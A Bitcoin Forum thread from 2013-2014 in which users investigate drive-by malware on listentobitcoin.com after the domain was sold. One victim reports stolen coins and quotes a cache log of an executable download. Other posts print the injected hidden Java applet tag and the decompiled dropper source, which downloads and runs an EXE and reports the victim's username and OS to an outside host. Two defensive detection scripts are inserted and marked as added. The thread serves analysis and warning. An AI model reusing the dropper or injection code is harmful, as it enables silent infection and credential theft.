Bitcoin Forum

Economy => Service Discussion => Topic started by: coastermonger on August 11, 2013, 07:52:39 PM



Title: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: coastermonger on August 11, 2013, 07:52:39 PM
FIRST PRIORITY, DO NOT GO TO LISTEN TO BITCOIN . COM

Saw this message come up from one of my AV recently.  https://i.imgur.com/Vi14xrE.png

along with a reddit post from the creator, apologizing for what happened to the site:
http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb

Can anyone elaborate on what kind of malware exists or existed at this site?  I was browsing with chrome and unfortunately hadn't seen the post yet.  I visited listentobitcoin, but chrome didn't bring up any warning and I wasn't asked to install anything. 

I'm curious what steps I need to take to make sure that my computer is clear.


Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: alp on August 11, 2013, 08:55:23 PM
Make sure it's clear?  Reformat.


Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: SlickTheNick on August 11, 2013, 09:20:30 PM
Hint: for the most part, Anti Virus software is mostly snake oil, especially McAfee, Norton etc.


Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: DiamondCardz on August 11, 2013, 09:33:44 PM
listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.


Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: Nagle on December 02, 2013, 10:42:19 PM
listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.
None of the major analysis tools find malware on "listentobitcoin.com".

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

This sounds like a scam to get people to switch to "bitlisten.com"


Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: Remember remember the 5th of November on December 03, 2013, 05:08:56 AM
listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.
None of the major analysis tools find malware on "listentobitcoin.com".

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

This sounds like a scam to get people to switch to "bitlisten.com"
Look at the date of the thread, please!


Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: DiamondCardz on December 03, 2013, 06:46:48 PM
listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.
None of the major analysis tools find malware on "listentobitcoin.com".

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

This sounds like a scam to get people to switch to "bitlisten.com"

First, nice gravedig.
Second, you're a retard.
Third, you probably haven't even gone on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.

Finally, http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb

Please get your facts together before you try to spread FUD about something you know nothing about. Thanks.


Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: Nagle on December 05, 2013, 04:02:04 AM
Third, you probably haven't even gone on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.
I've been looking at the code on both sites, and running the sites through various testers, and I'm not seeing any malware.  But I think there's a bug in Firefox's playing of audio files which results in choppy audio.  Both sites will produce choppy audio after they've been running for a while. Once this has happened, Firefox has to be restarted to fix the problem. This appears under both Windows 7 and Linux.


Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: DiamondCardz on December 05, 2013, 06:54:58 AM
Third, you probably haven't even gone on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.
I've been looking at the code on both sites, and running the sites through various testers, and I'm not seeing any malware.

Interesting. I don't know how the domain might have been re-acquired, but it was throwing up malware.


Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: devthedev on December 09, 2013, 02:39:38 PM
I said this below, but I want it to be a part of this post as well: I realize now that I made a very foolish mistake by selling the domain to someone untrustworthy, and I want to personally apologize to everyone who has been affected. I was too trusting, I made a huge mistake, and for what my words are worth, I promise that it won’t happen again.

~Maximillian Laumeister

http://bitcoinexaminer.org/listentobitcoin-com-was-infected-by-an-anonymous-buyer-says-founder-of-the-website/


Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: nfuse on January 05, 2014, 03:14:51 AM
Well, for me it was too late. I lost 0.47 BTC and 15 LTC today because of this shit. About 23 December I visited listentobitcoin.com, and today I found out my cryptsy.com account was emptied.

After searching, I found in the Java logs the answer that says it all:

    http://listentobitcoin.info/sezam.exe   188.165.49.114   <null>
    HTTP/1.1 200 OK
    content-length 502272
    last-modified Fri, 20 Dec 2013 17:50:53 GMT
    expires Mon, 06 Jan 2014 15:44:16 GMT
    content-type application/octet-stream
    date Mon, 23 Dec 2013 15:44:16 GMT
    server nginx
    cache-control max-age=1209600

sezam.exe creates a directory called /directory/cybergate/googleupdate.exe, which allowed the hacker (lowlife scum) to access my laptop when I was away.

I hopefully learned my lesson and am using 2FA for now. Now I just need something to put back on my account :-[

If you, thief, have a change of heart and want to sleep better at night, please return my BTC to 192ou1R5P3MQNtFoYDh1SuEDjcbGMJYZtk
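
A triage sketch for cache entries like the one quoted above, as an added example that is not part of the original post: it scans an entry's raw bytes for the fetched URL, server IP and HTTP headers, and flags entries where an executable was downloaded. The function names, the placeholder hosts and addresses, and the length-prefixed field layout used to build the sample entries are assumptions made for illustration.

```python
import re

URL_RE = re.compile(rb"https?://[\x21-\x7e]+")
IP_RE = re.compile(rb"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
# Header name, separator bytes (space, colon, NUL or a small length byte), value.
HDR_RE = re.compile(rb"(content-type|content-length|server)[\x00-\x20:]+([\x21-\x7e]+)")
EXEC_TYPES = {"application/x-msdownload", "application/x-dosexec"}
EXEC_EXT = (".exe", ".scr", ".dll", ".msi")

def triage(blob):
    """Extract URL, server IP and key HTTP headers from one cache entry's bytes."""
    url = URL_RE.search(blob)
    ip = IP_RE.search(blob)
    headers = {m.group(1).decode(): m.group(2).decode() for m in HDR_RE.finditer(blob)}
    entry = {"url": url.group().decode() if url else None,
             "ip": ip.group().decode() if ip else None,
             "headers": headers}
    path = (entry["url"] or "").split("?")[0].lower()
    ctype = headers.get("content-type", "").lower()
    # An applet cache has no legitimate reason to hold a Windows executable.
    entry["executable"] = path.endswith(EXEC_EXT) or ctype in EXEC_TYPES
    return entry

def _utf(s):
    # Assumed layout for the constructed samples: 2-byte length, then the text.
    return len(s).to_bytes(2, "big") + s.encode()

def _entry(url, ip, ctype, length):
    fields = [url, ip, "<null>", "HTTP/1.1 200 OK", "content-length", length,
              "content-type", ctype, "server", "nginx"]
    return b"\x00\x00\x02\x5d" + b"".join(_utf(f) for f in fields)

# Constructed entries: one shaped like the post's log line, one ordinary JAR fetch.
BAD = _entry("http://downloads.example/payload.exe", "203.0.113.10",
             "application/octet-stream", "502272")
GOOD = _entry("http://cdn.example/app.jar", "198.51.100.7",
              "application/java-archive", "88121")

if __name__ == "__main__":
    for name, blob in (("BAD", BAD), ("GOOD", GOOD)):
        e = triage(blob)
        print(name, e["url"], e["ip"], "EXECUTABLE" if e["executable"] else "ok")
```

Because the scan is regex-based, it also works on a text dump where the fields are separated by spaces, as in the log above.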


Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: Nagle on January 05, 2014, 08:03:07 AM
The malware seems to be back. At the end of "www.listentobitcoin.com" is this code:

Code:
<applet name="JavaUpdate" code="Client.class" archive="http://secure-jar.com/PLFG/Java.jar" width="0" height="0">
<param name="us" value="javasan.exe">
<param name="ca" value="http://ge.tt/api/1/files/4mRU7fB1/0/blob?download">
<param name="uk" value="http://www.listentobitcoin.com">
<param name="nl" value="fox33">
</applet>
This is appended to the end of the page, outside the </html> tag. This looks like something a break-in attack appended automatically and blindly.
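
A check a site owner could run against their own pages for this kind of injection, as an added example that is not part of the original post: it flags plugin tags that appear after `</html>`, are zero-sized, or load code from another host. The sample page, host names and function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

PLUGIN_TAGS = {"applet", "object", "embed"}

def _site(host):
    # Lower-case a host name and drop a leading "www." for comparison.
    host = (host or "").lower()
    return host[4:] if host.startswith("www.") else host

class PluginTagAudit(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.site = _site(page_host)
        self.html_closed = False      # True once </html> has been seen
        self.findings = []            # (tag, line number, [reasons])

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True

    def handle_starttag(self, tag, attrs):
        if tag not in PLUGIN_TAGS:
            return
        a = {k: (v or "").strip() for k, v in attrs}
        reasons = []
        if self.html_closed:
            reasons.append("after </html>")
        if a.get("width") in ("0", "0px") or a.get("height") in ("0", "0px"):
            reasons.append("zero-size")
        src = a.get("archive") or a.get("data") or a.get("src") or ""
        host = _site(urlparse(src).hostname)
        if host and host != self.site and not host.endswith("." + self.site):
            reasons.append("off-site code: " + host)
        if reasons:
            self.findings.append((tag, self.getpos()[0], reasons))

def audit(html, page_host):
    parser = PluginTagAudit(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed page modelled on the snippet in the post (hosts are placeholders).
SAMPLE = """<html><body>
<object data="/player.swf" width="400" height="300"></object>
</body></html>
<applet code="Client.class" archive="http://jar-host.example/Java.jar" width="0" height="0"></applet>
"""
FINDINGS = audit(SAMPLE, "www.site.example")  # one finding: the applet on line 4
```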


Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: daviducsb on January 06, 2014, 10:22:28 AM
Are Apple computers susceptible to the malware on listentobitcoins or only PCs? If one visited the site on an Apple is one at risk?


Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: daviducsb on January 06, 2014, 05:55:14 PM
Hello... Anybody... Is it a threat to Apple Macs?

thx


Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: someguy123 on January 18, 2014, 08:06:04 PM
I decompiled their Java file and it seems to be some kind of download script. Here's Malwarebytes' post about it: http://blog.malwarebytes.org/fraud-scam/2014/01/musical-bitcoin-bubbles-serve-java-applets-malware/

Here's the source code decompiled for any security people
Code:
import java.applet.Applet;
import java.applet.AppletContext;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;
import java.net.URLConnection;

public class SecureJAR extends Applet
{
  public void init()
  {
    String str1 = System.getProperty("user.name");
    String str2 = System.getProperty("os.name");
    String str3 = System.getenv("temp");
    String str4 = "\\";
    String str5 = getParameter("rgsicvnjbn");
    String str6 = str4.concat(str5);
    String str7 = str3.concat(str6);
    Object localObject = getParameter("ioqujbjsyq");
    String str8 = "&yuvcpearce=";
    String str9 = getParameter("ivmbhojyjv");
    try
    {
      str2 = str2.replace(" ", "%20");
      str1 = str1.replace(" ", "%20");
      FileOutputStream localFileOutputStream = new FileOutputStream(str7);
      Runtime localRuntime = Runtime.getRuntime();
      URL localURL1 = new URL(getParameter("xmxdnhwphy"));
      URLConnection localURLConnection = localURL1.openConnection();
      InputStream localInputStream = localURLConnection.getInputStream();
      byte[] arrayOfByte = new byte[1024];
      int i;
      while ((i = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1)
        localFileOutputStream.write(arrayOfByte, 0, i);
      localInputStream.close();
      localFileOutputStream.close();
      localRuntime.exec(str7);
      localObject = new URL((String)localObject);
      getAppletContext().showDocument((URL)localObject);
      URL localURL2 = new URL("http://epickit.net/qsxnonlvrc.php?username=" + str9 + str8.replace("yuvcpearce", "evyaipgncs") + str2 + str8.replace("yuvcpearce", "piyhnvzbpw") + str1 + str8.replace("yuvcpearce", "tlbkqdpvxm") + "Traditional");
      localURL2.openStream();
    }
    catch (Exception localException)
    {
    }
  }
}


Title: Re: Got this risk message, can someone elaborate on the listentobitcoin malware?
Post by: someguy123 on January 18, 2014, 08:16:19 PM
Hello... Anybody... Is it a threat to Apple Macs?

thx
The virus appears to download an EXE payload. Whether or not it has alternative payloads for Mac or Linux is unknown, but if you've visited the site and allowed the JAR to run, you may want to run some form of Mac security program, as it's now detected by a good amount of antivirus programs.